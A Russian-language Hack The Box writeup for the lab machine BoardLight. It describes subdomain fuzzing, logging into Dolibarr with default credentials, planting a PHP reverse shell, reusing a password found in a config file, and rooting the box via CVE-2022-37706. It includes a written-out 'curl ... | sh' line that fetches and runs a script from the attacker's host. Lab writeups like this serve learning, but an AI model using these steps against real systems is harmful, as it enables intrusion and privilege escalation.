HTB BoardLight writeup by Arkeil
Разведка
Разведку начнем со сканирования портов.
Результат сканирования:
Мы видим только 80 и 22 порт. На 80 порту мы видим обычный одностраничный сайт:
Но в конце страницы мы можем увидеть FQDN хоста board.htb, сразу добавим его в /etc/hosts
При фаззинге директорий dirsearch и gobaster ничего не показали. Настало время фаззить поддомены. Для фаззинга поддоменов я использую ffuf. После фаззинга можем увидеть, что был найден crm.board.htb
При входе на сайт crm.board.htb мы видим Dolibar 17.0.0
Пользователь
На гите есть CVE с помощью которой можно сделать RCE, но есть одна небольшая проблема. У нас нет логина и пароля. Что делать? В голову приходит гениальная идея найти и использовать дефолтный логин и пароль (admin/admin). И оно работает! После изучение сайта было найдено, что мы можем создавать php страницы.
Создадим свой вебсайт и страницу с полезной нагрузкой при помощи https://www.revshells.com/. Я решил использовать revshell от PentestMonkey.
После запуска сайта мы получаем реверс шелл:
Отлично, давайте посмотрим какие пользователи есть на хосте и попробуем заполучить его. Проверим директорию /home. В этой директории мы обнаруживаем пользователя larissa
В документации Dolibar можно найти файл конфигурации, где может быть указан логин и пароль к базе данных. В данном случае файл находится по пути /var/www/html/crm.board.htb/htdocs/conf/conf.php
В файле мы обнаруживаем логин и пароль
Но, к сожалению, в базе данных ничего интересного не обнаруживается и меня посещает мысль о том, что данный пароль может подойти юзеру. На удивление оно так и происходит и мы забираем флаг пользователя!
Root
Пользователь larissa состоит в группе adm, но к сожалению, это нам ничего не дает. Давайте запустим linpeas, посмотрим, что он нам покажет. Для того чтобы не загружать на хост и не давать подсказку другим пользователям используем такую команду:
curl http://<IP>:<port>/linpeas.sh | sh
Вывод linpeas показал нам различные SUID файлы.
Меня зацепили файлы в папке enlightenment и я начал искать в интернете что с ними может быть связано. По первой же ссылке я нашел CVE-2022-37706 и решил воспользоваться данной уязвимостью с помощью https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit.
Загружаем exploit.sh на хост который мы ломаем и запускаем его. И мы получаем пользователя root!
И теперь мы можем прочитать рутовский флаг!
На этом writeup считается завершенным!
